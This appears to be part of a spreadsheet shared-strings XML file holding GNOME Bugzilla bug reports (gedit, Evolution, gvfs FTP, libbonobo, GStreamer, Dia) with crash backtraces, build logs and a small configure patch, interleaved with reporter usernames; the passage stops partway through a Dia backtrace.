  <si>
    <t>GEDIT-460420</t>
  </si>
  <si>
    <t>gedit sticks to all workspaces</t>
  </si>
  <si>
    <t>I don't quite understand this but it has annoyed me for months on all my computers running compiz: gedit sticks to all the workspaces. Whenever you zoom out or switch workspaces you will always have gedit in your face no matter what you do.
This happens only with compiz (or beryl back in the day) and gedit is the *only* application that does this. What's up?</t>
  </si>
  <si>
    <t>GTKHTML-215395</t>
  </si>
  <si>
    <t>Replied to an email and it crashed</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Critical
Version: 0.16.0.1
Synopsis: Replied to an email and it crashed
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Replied to an email and i got a crash. I'll try to reproduce it and let
you know.
Debugging Information:
0x40c96ce9 in __wait4 () from /lib/libc.so.6
#0  0x40c96ce9 in __wait4 () from /lib/libc.so.6
#1  0x40d13f98 in __DTOR_END__ () from /lib/libc.so.6
#2  0x409812a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
#3  
#4  0x40d124c8 in main_arena () from /lib/libc.so.6
#5  0x4003e8a1 in gtk_html_stream_close (stream=0x8102858 
    status=GTK_HTML_STREAM_OK) at gtkhtml-stream.c:130
#6  0x8064a72 in html_stream_mem_destroy (object=0x80fcc10)
    at html-stream-mem.c:50
#7  0x40aa7b9b in gtk_marshal_NONE__NONE (object=0x80fcc10 
    func=0x8064a40  func_data=0x0 args=0xbfffe780)
    at gtkmarshal.c:312
#8  0x40ad670f in gtk_signal_real_emit (object=0x80fcc10 signal_id=1 
    params=0xbfffe780) at gtksignal.c:1492
#9  0x40ad4744 in gtk_signal_emit (object=0x80fcc10 signal_id=1)
    at gtksignal.c:552
#10 0x40ab95e1 in gtk_object_shutdown (object=0x80fcc10) at gtkobject.c:255
#11 0x40ab9583 in gtk_object_destroy (object=0x80fcc10) at gtkobject.c:246
#12 0x4076ff4c in bonobo_object_destroy (ao=0x80fcc60) at bonobo-object.c:174
#13 0x40770222 in bonobo_object_unref (object=0x80fcc10) at bonobo-object.c:278
#14 0x805caa8 in send_event_stream (engine=0x80ae3a8 listener=0x80c2480 
    name=0x806d309 url_requested 
    url=0x80ff8a0 http://graphics.hotmail.com/emsmilep.gif stream=0x810e250)
    at editor-control-factory.c:696
#15 0x805be2c in url_requested_cb (html=0x80b5638 
    url=0x80ff8a0 http://graphics.hotmail.com/emsmilep.gif 
    handle=0x810e250 data=0x80c08b8) at editor-control-factory.c:340
#16 0x40aa7bd4 in gtk_marshal_NONE__POINTER_POINTER (object=0x80b5638 
    func=0x805bd44  func_data=0x80c08b8 args=0xbfffec40)
    at gtkmarshal.c:340
#17 0x40ad726e in gtk_handlers_run (handlers=0x807f1b8 signal=0xbfffebe0 
    object=0x80b5638 params=0xbfffec40 after=0) at gtksignal.c:1917
#18 0x40ad66cf in gtk_signal_real_emit (object=0x80b5638 signal_id=73 
    params=0xbfffec40) at gtksignal.c:1477
#19 0x40ad4744 in gtk_signal_emit (object=0x80b5638 signal_id=73)
    at gtksignal.c:552
#20 0x4003f105 in html_engine_url_requested_cb (engine=0x80bf6f0 
    url=0x80ff8a0 http://graphics.hotmail.com/emsmilep.gif 
    handle=0x810e250 data=0x80b5638) at gtkhtml.c:385
#21 0x40aa7bd4 in gtk_marshal_NONE__POINTER_POINTER (object=0x80bf6f0 
    func=0x4003f0ac  func_data=0x80b5638 
    args=0xbffff020) at gtkmarshal.c:340
#22 0x40ad726e in gtk_handlers_run (handlers=0x807f378 signal=0xbfffefb0 
    object=0x80bf6f0 params=0xbffff020 after=0) at gtksignal.c:1917
#23 0x40ad66cf in gtk_signal_real_emit (object=0x80bf6f0 signal_id=96 
    params=0xbffff020) at gtksignal.c:1477
#24 0x40ad4ad3 in gtk_signal_emit_by_name (object=0x80bf6f0 
    name=0x400919fc url_requested) at gtksignal.c:618
#25 0x4006e070 in html_image_pointer_load (ip=0x80ff878) at htmlimage.c:1329
#26 0x4006e23c in html_image_factory_register (factory=0x80c02e8 i=0x8101988 
    filename=0x80fdc38 http://graphics.hotmail.com/emsmilep.gif reload=0)
    at htmlimage.c:1367
#27 0x4006d058 in html_image_init (image=0x8101988 klass=0x40098d00 
    imf=0x80c02e8 
    filename=0x80fdc38 http://graphics.hotmail.com/emsmilep.gif url=0x0 
    target=0x0 width=12 height=12 percent_width=0 percent_height=0 
    border=0 color=0x80fdc68 valign=HTML_VALIGN_BOTTOM) at htmlimage.c:714
#28 0x4006d0c2 in html_image_new (imf=0x80c02e8 
    filename=0x80fdc38 http://graphics.hotmail.com/emsmilep.gif url=0x0 
    target=0x0 width=12 height=12 percent_width=0 percent_height=0 
    border=0 color=0x80fdc68 valign=HTML_VALIGN_BOTTOM) at htmlimage.c:732
#29 0x40062a5c in parse_i (e=0x80bf6f0 _clue=0x810e910 
    str=0x8100a6e img height=12 src=\http://graphics.hotmail.com/emsmilep.gif\ width=12&gt;) at htmlengine.c:2359
#30 0x400641bc in parse_one_token (p=0x80bf6f0 clue=0x810e910 
    str=0x8100a6d ) at htmlengine.c:3019
#31 0x4005e96d in parse_body (e=0x80bf6f0 clue=0x810e910 end=0x400964c8 
    toplevel=1) at htmlengine.c:792
#32 0x40065617 in html_engine_timer_event (e=0x80bf6f0) at htmlengine.c:3813
#33 0x4006573d in html_engine_stream_end (stream=0x810e8e8 
    status=GTK_HTML_STREAM_OK data=0x80bf6f0) at htmlengine.c:3871
#34 0x4003e8a1 in gtk_html_stream_close (stream=0x810e8e8 
    status=GTK_HTML_STREAM_OK) at gtkhtml-stream.c:130
#35 0x4004265f in gtk_html_end (html=0x80b5638 handle=0x810e8e8 
    status=GTK_HTML_STREAM_OK) at gtkhtml.c:2275
#36 0x8061758 in ps_impl_load (ps=0x80c0ef8 stream=0x810e578 
    type=0x810e820 text/html data=0x80b5638 ev=0xbffff5f0)
    at persist-stream-impl.c:82
#37 0x40772731 in impl_load (servant=0x80c0f54 stream=0x810e578 
    type=0x810e820 text/html ev=0xbffff5f0) at bonobo-persist-stream.c:41
#38 0x4075aa43 in _ORBIT_skel_Bonobo_PersistStream_load (
    _ORBIT_servant=0x80c0f54 _ORBIT_recv_buffer=0x80ae0f8 ev=0xbffff5f0 
    _impl_load=0x407726e0 ) at Bonobo-skels.c:3509
#39 0x408d9190 in ORBit_POA_handle_request (recv_buffer=0x80ae0f8 
    poa=0x809acc8) at orbit_poa.c:513
#40 0x408db3f2 in ORBit_handle_incoming_request (recv_buffer=0x80ae0f8)
    at server.c:90
#41 0x408db619 in ORBit_handle_incoming_message (recv_buffer=0x80ae0f8)
    at server.c:160
#42 0x408f23a8 in giop_main_handle_connection (connection=0x80c1d68)
    at connection.c:1214
#43 0x4089dac5 in orb_handle_connection (source=0x80c1d20 cond=G_IO_IN 
    cnx=0x80c1d68) at oaf-mainloop.c:70
#44 0x40bcfa7a in g_io_unix_dispatch (source_data=0x80c1b40 
    current_time=0xbffff780 user_data=0x80c1d68) at giounix.c:137
#45 0x40bd1055 in g_main_dispatch (dispatch_time=0xbffff780) at gmain.c:656
#46 0x40bd1659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#47 0x40bd17e8 in g_main_run (loop=0x80ae048) at gmain.c:935
#48 0x40aa63ab in gtk_main () at gtkmain.c:524
#49 0x4076c45b in bonobo_main () at bonobo-main.c:283
#50 0x805cdea in main (argc=3 argv=0xbffff874) at editor-control-factory.c:885
#51 0x40bff386 in __libc_start_main (main=0x805cd80  argc=3 
    ubp_av=0xbffff874 init=0x8051440  fini=0x806be10  
    rtld_fini=0x4000d318  stack_end=0xbffff86c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40c96ce9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40d13f98 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x409812a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 0
in_segv = 1
pid = 0
#3  
No locals.
#4  0x40d124c8 in main_arena () from /lib/libc.so.6
No symbol table info available.
#5  0x4003e8a1 in gtk_html_stream_close (stream=0x8102858 
    status=GTK_HTML_STREAM_OK) at gtkhtml-stream.c:130
stream = (GtkHTMLStream *) 0x8102858
#6  0x8064a72 in html_stream_mem_destroy (object=0x80fcc10)
    at html-stream-mem.c:50
50			gtk_html_stream_close (bhtml-&gt;html_stream GTK_HTML_STREAM_OK)
object = (GtkObject *) 0x80fcc10
bhtml = (HTMLStreamMem *) 0x80fcc10
#7  0x40aa7b9b in gtk_marshal_NONE__NONE (object=0x80fcc10 
    func=0x8064a40  func_data=0x0 args=0xbfffe780)
    at gtkmarshal.c:312
No locals.
Unknown reporter: chema@celorio.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>GVFS-525283</t>
  </si>
  <si>
    <t>ftp backend</t>
  </si>
  <si>
    <t>handle short reads in ftp</t>
  </si>
  <si>
    <t>Please describe the problem:
This bug is thoroughly explained and reported at: http://bugs.launchpad.net/bugs/208750
If I try to open ftp://dasher.sh3lls.net/ using the gvfs backend in nautilus I get an error without a login prompt:
Couldn't display ftp://dasher.sh3lls.net/.
Error: Invalid reply
Please select another viewer and try again.
This happens to a lot of *.sh3lls.net servers to my knowledge if not all vortex.sh3lls.net astro.sh3lls.net dasher.sh3lls.net and eclipse.sh3lls.net. This happens even if I provide a username: nautilus ftp://test@dasher.sh3lls.net/
I can connect to these using ftp lftp and gftp.
I noticed some difference in the output of gvfsd -r in the banner of the pure-ftpd server that this servers use as ftp daemon.
Steps to reproduce:
1. nautilus ftp://dasher.sh3lls.net
2. no login prompt
3. error invalid reply
Actual results:
A window Error: Invalid reply shows up.
Expected results:
I don't get a login prompt asking me for a username and password as it does with other websites i.e. ftp://ftp.mozilla.org
Does this happen every time?
Yes
Other information:
At first I thought it was a problem linked to pure-ftpd until I found another website that had pure-ftpd where it did actually ask me to login: ftp://ftp.greek-fun.com
This error is normal and you can get the same error in any ftp server only if you select to connect anonymously from the login prompt.
It looks like gvfsd -r sees and parses the ftp banner differently. If you see below I compared the output of /usr/lib/gvfs/gvfsd -r (and tried to connect using the gvfs backend) with the corresponding telnet connection on port 21. Notice the difference in the end of the pure-ftp banner: &lt;-- [TLS] or ----&lt;-- ------
1) nautilus ftp://test@dasher.sh3lls.net
Added new job source 0x642010 (GVfsBackendFtp)
Queued new job 0x643030 (GVfsJobMount)
&lt;-- 220---------- Welcome to Pure-FTPd [privsep] &lt;-- [TLS] ----------
send_reply failed: 1
2) nautilus ftp://test@astro.sh3lls.net
Added new job source 0x642010 (GVfsBackendFtp)
Queued new job 0x643030 (GVfsJobMount)
&lt;-- 220---------- Welcome to Pure-FTPd [TLS] ----&lt;-- ------
send_reply failed: 1
3)(the working one) nautilus ftp://test@ftp.greek-fun.com
Added new job source 0x642010 (GVfsBackendFtp)
Queued new job 0x643030 (GVfsJobMount)
&lt;-- 220---------- Welcome to Pure-FTPd [TLS] ----------
&lt;-- 220-You are user number 1 of 50 allowed.
&lt;-- 220-Local time is now 20:22. Server port: 21.
&lt;-- 220-IPv6 connections are also welcome on this server.
&lt;-- 220 You will be disconnected after 15 minutes of inactivity.
(I hit cancel at the login prompt)
send_reply failed: 1
..with the results of their corresponding telnet:
1) $ telnet dasher.sh3lls.net 21
Trying 66.252.13.2...
Connected to dasher.sh3lls.net.
Escape character is '^]'.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 12:26. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
2) $ telnet astro.sh3lls.net 21
Trying 69.42.213.130...
Connected to astro.sh3lls.net.
Escape character is '^]'.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 17:27. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
3) $ telnet ftp.greek-fun.com 21
Trying 72.52.215.141...
Connected to ftp.greek-fun.com.
Escape character is '^]'.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 12:29. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.</t>
  </si>
  <si>
    <t>vicedar</t>
  </si>
  <si>
    <t>EVOLUTION-461918</t>
  </si>
  <si>
    <t xml:space="preserve">Incorrect string: describes version  of </t>
  </si>
  <si>
    <t>This manual describes version  of 
Obviously should be:
This manual describes version 2.12 of Evolution.</t>
  </si>
  <si>
    <t>pradhika</t>
  </si>
  <si>
    <t>aloriel</t>
  </si>
  <si>
    <t>VTE-100614</t>
  </si>
  <si>
    <t>Cannot disable python bindings on configure</t>
  </si>
  <si>
    <t>configure does not have an option to disable the python bindings.  This is
useful for people who do not have python and pygtk installed but still
want to build the gnome-terminal using vte.</t>
  </si>
  <si>
    <t>baudais</t>
  </si>
  <si>
    <t>TOMBOY-160728</t>
  </si>
  <si>
    <t>saved XML fomat not namespace-well formed</t>
  </si>
  <si>
    <t>The saved tomboy files in ~/.tomboy use an
undeclared link: namespace prefix. This
prevents use of xslt on the files (for
example).
Please declare the namespace remove the prefix
or use xlink.
Thanks!</t>
  </si>
  <si>
    <t>EVOLUTION-208174</t>
  </si>
  <si>
    <t>can't compose message</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.12
Synopsis: can't compose message
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Gives unhelpful messages when I try to open a compose window
Unknown reporter: tmartin@andrew.cmu.edu changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>tmartin</t>
  </si>
  <si>
    <t>BONOBO-376211</t>
  </si>
  <si>
    <t>libbonobo</t>
  </si>
  <si>
    <t>configure succeeds compile fails due to bad ORBit version</t>
  </si>
  <si>
    <t>Please describe the problem:
My system has ORBit 2.10.2 installed.
I am trying to build libbonobo-2.16.0.
The configure step (configure --prefix=/usr --enable-gtk-doc i486-slackware-linux) succeeds.
However the build fails with the following error:
i486-slackware-linux-gcc -O2 -march=i486 -mcpu=i686 -o .libs/bonobo-activation-server activation-server-corba-extensions.o activation-context-query.o activation-context-query-lexer.o activation-context-query-parser.o activation-context-corba.o object-directory-corba.o object-directory-load.o object-directory-activate.o object-directory-config-file.o activation-server-main.o -Wl--export-dynamic -pthread  ../bonobo/.libs/libbonobo-2.so /mnt/raid/download/computer/software/gnome/libbonobo/2.16/src/libbonobo-2.16.0/bonobo-activation/.libs/libbonobo-activation.so ../bonobo-activation/.libs/libbonobo-activation.so -lname-server-2 /usr/lib/libORBitCosNaming-2.so /usr/lib/libORBit-2.so /usr/lib/libpopt.so /usr/lib/libgobject-2.0.so /usr/lib/libgmodule-2.0.so /usr/lib/libgthread-2.0.so -lpthread /usr/lib/libglib-2.0.so -lrt /usr/lib/libxml2.so -ldl -lz -lm
object-directory-corba.o(.text+0x1978): In function `client_cnx_broken':
: undefined reference to `ORBit_sequence_remove'
collect2: ld returned 1 exit status
make[3]: *** [bonobo-activation-server] Error 1
make[3]: Leaving directory `/mnt/raid/download/computer/software/gnome/libbonobo/2.16/src/libbonobo-2.16.0/activation-server'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/mnt/raid/download/computer/software/gnome/libbonobo/2.16/src/libbonobo-2.16.0/activation-server'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/mnt/raid/download/computer/software/gnome/libbonobo/2.16/src/libbonobo-2.16.0'
make: *** [all] Error 2
make failed.
The ChangeLog for ORBit2 indicates that the function ORBit_sequence_remove was added for ORBit2 version 2.11.2.  However libbonobo's configure script requires only version 2.9.2.
I adjusted configure.in as per proposed patch below and ran autoconf.  configure then correctly identified the wrong version of ORBit2.
NOTE: I plan to upgrade my system to ORBit2-2.14.3 after filing this bug.  Therefore I most likely will not detect any build errors that may occur later with ORBit2-2.11.2.
Steps to reproduce:
see description.
Actual results:
Build fails
Expected results:
configure should have indicated that the version of ORBit2 is insufficient to proceed with build.
Does this happen every time?
yes.
Other information:
Proposed patch:
diff -r -u libbonobo-2.16.0/configure.in libbonobo-2.16.0.patched/configure.in
--- libbonobo-2.16.0/configure.in       2006-09-04 09:08:02.000000000 -0600
+++ libbonobo-2.16.0.patched/configure.in       2006-11-16 23:41:26.000000000 -0700
@@ -1027 +1027 @@
 #
 # Start of pkg-config checks
 #
-ORBIT_VERSION=2.9.2
+ORBIT_VERSION=2.11.2
 GLIB_VERSION=2.8.0
 PKG_CHECK_MODULES(LIBBONOBO \</t>
  </si>
  <si>
    <t>GDM-426653</t>
  </si>
  <si>
    <t>hide uninstalled languages from language list</t>
  </si>
  <si>
    <t>So I just noticed we have a patch in in rawhide for gdm without an upstream bug reference and I don't see it posted anywhere from a quick search.
GDM shows languages that the user doesn't have font coverage for which is ugly and probably not useful.</t>
  </si>
  <si>
    <t>GTK+-61933</t>
  </si>
  <si>
    <t>gdkfont-fb.c doesn't compile</t>
  </si>
  <si>
    <t xml:space="preserve">
Package: gtk+
Version: 1.3.9 (CVS snapshot)
pango-0.20 (CVS snapshot):
perhaps the new PangoFontMetrics interface has to be taken in account
but a quick fix consist of:
1) copying struct _PangoFontDescription to gdkfont-fb.c since it's not
exposed in pango .h files
2) define PANGO_ENABLE_BACKEND for some structures to be exposed
3) the syntax of pango_font_get_metrics has changed now in function
gdk_font_from_description I used:
PangoFontMetrics *metrics
....
metrics = pango_font_get_metrics(pango_gontlang)
....
Thanks
Bye!
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-10-08 05:33 -------
The original reporter (chri@ascensit.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gtk-bugs@gtk.org.
</t>
  </si>
  <si>
    <t>chri</t>
  </si>
  <si>
    <t>GSTREAMER-315868</t>
  </si>
  <si>
    <t>GST_DOC used in configure.ac not expanded correctly</t>
  </si>
  <si>
    <t>Please describe the problem:
This is for gstreamer-0.8.11.  I noticed one of the plugins wasn't building as
it had in the past.  On diffing and older tarball that did build the plugin and
the newer tarball I noticed GST_DOC was replaced by GST_DOCBOOK_CHECK but
GST_DOC was still being used by configure.ac which caused other macros to fail
causing the side effect of the one module not building.  It was an unimportant
module (qcam) so this most likely went unnoticed.
Steps to reproduce:
1. compile the source
Actual results:
qcam isn't compiled (side effect)
Expected results:
qcam is compiled
Does this happen every time?
yes
Other information:
I have a patch</t>
  </si>
  <si>
    <t>DIA-118760</t>
  </si>
  <si>
    <t>dia-gnome crashed when typing Ctrl-Q (exit)</t>
  </si>
  <si>
    <t>Package: dia
Severity: normal
Version: 0.91
Synopsis: dia-gnome crashed when typing Ctrl-Q (exit)
Bugzilla-Product: dia
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.2.2)
Description:
Description of Problem:
dia-gnome crashed when typing Ctrl-Q (exit)
Steps to reproduce the problem:
1. Type Ctrl-Q.
2. 
3. 
Actual Results:
Segmentation fault.
Expected Results:
Clean program exit.
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/dia-gnome'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New
Thread 16384 (LWP 7011)]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0x409bcaf9
in wait4 () from /lib/libc.so.6
#0  0x409bcaf9 in wait4 () from /lib/libc.so.6
#1  0x40a2ff60 in sys_sigabbrev () from /lib/libc.so.6
#2  0xbfffba80 in ?? ()
#3  0x409bcaab in waitpid () from /lib/libc.so.6
#4  0x4082d061 in waitpid () from /lib/libpthread.so.0
#5  0x401189b8 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#6  0x4082e75a in __pthread_sighandler () from /lib/libpthread.so.0
#7  
#8  0x40fd63e0 in umlclass_get_properties () from
/usr/lib/dia/libuml_objects.so
#9  0x40fd6590 in umlclass_get_properties () from
/usr/lib/dia/libuml_objects.so
#10 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#11 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#12 0x40806f46 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#13 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#14 0x40361903 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#15 0x40323a83 in gtk_list_scroll_vertical () from
/usr/lib/libgtk-x11-2.0.so.0
#16 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#17 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#18 0x40806f46 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#19 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#20 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#21 0x40315acb in gtk_item_deselect () from
/usr/lib/libgtk-x11-2.0.so.0
#22 0x403246d3 in gtk_list_item_deselect () from
/usr/lib/libgtk-x11-2.0.so.0
#23 0x4032244e in gtk_list_undo_selection () from
/usr/lib/libgtk-x11-2.0.so.0
#24 0x40807d89 in g_cclosure_marshal_VOID__OBJECT () from
/usr/lib/libgobject-2.0.so.0
#25 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#26 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#27 0x4080689a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#28 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#29 0x40361903 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#30 0x4032165c in gtk_list_unselect_child () from
/usr/lib/libgtk-x11-2.0.so.0
#31 0x40320fec in gtk_list_clear_items () from
/usr/lib/libgtk-x11-2.0.so.0
#32 0x4031f6f7 in gtk_list_new () from /usr/lib/libgtk-x11-2.0.so.0
#33 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#34 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#35 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#36 0x402b62b5 in gtk_bin_get_type () from /usr/lib/libgtk-x11-2.0.so.0
#37 0x402de915 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#38 0x402ddbf7 in gtk_container_class_list_child_properties () from
/usr/lib/libgtk-x11-2.0.so.0
#39 0x403dd05d in gtk_viewport_new () from /usr/lib/libgtk-x11-2.0.so.0
#40 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#41 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#42 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#43 0x40806c0a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#44 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#45 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#46 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#47 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
#48 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#49 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#50 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#51 0x402b62b5 in gtk_bin_get_type () from /usr/lib/libgtk-x11-2.0.so.0
#52 0x4035b973 in gtk_scrolled_window_get_shadow_type () from
/usr/lib/libgtk-x11-2.0.so.0
#53 0x402de915 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#54 0x402ddbf7 in gtk_container_class_list_child_properties () from
/usr/lib/libgtk-x11-2.0.so.0
#55 0x4035b596 in gtk_scrolled_window_get_shadow_type () from
/usr/lib/libgtk-x11-2.0.so.0
#56 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#57 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#58 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#59 0x40806c0a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#60 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#61 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#62 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#63 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
#64 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#65 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#66 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#67 0x402ba55e in gtk_box_set_child_packing () from
/usr/lib/libgtk-x11-2.0.so.0
#68 0x402de915 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#69 0x402ddbf7 in gtk_container_class_list_child_properties () from
/usr/lib/libgtk-x11-2.0.so.0
#70 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#71 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#72 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#73 0x40806c0a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#74 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#75 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#76 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#77 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
#78 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#79 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#80 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#81 0x402ba55e in gtk_box_set_child_packing () from
/usr/lib/libgtk-x11-2.0.so.0
#82 0x402de915 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#83 0x402ddbf7 in gtk_container_class_list_child_properties () from
/usr/lib/libgtk-x11-2.0.so.0
#84 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#85 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#86 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#87 0x40806c0a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#88 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#89 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#90 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#91 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
#92 0x407f926d in g_object_class_list_properties () from
/usr/lib/libgobject-2.0.so.0
#93 0x403e18b8 in gtk_widget_unparent () from
/usr/lib/libgtk-x11-2.0.so.0
#94 0x4033c736 in gtk_notebook_new () from /usr/lib/libgtk-x11-2.0.so.0
#95 0x4033a08b in gtk_notebook_new () from /usr/lib/libgtk-x11-2.0.so.0
#96 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#97 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#98 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#99 0x40806c0a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#100 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#101 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#102 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#103 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
#104 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#105 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#106 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#107 0x402ba55e in gtk_box_set_child_packing () from
/usr/lib/libgtk-x11-2.0.so.0
#108 0x402de915 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#109 0x402ddbf7 in gtk_container_class_list_child_properties () from
/usr/lib/libgtk-x11-2.0.so.0
#110 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#111 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#112 0x407f7872 in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#113 0x40806c0a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#114 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#115 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#116 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#117 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
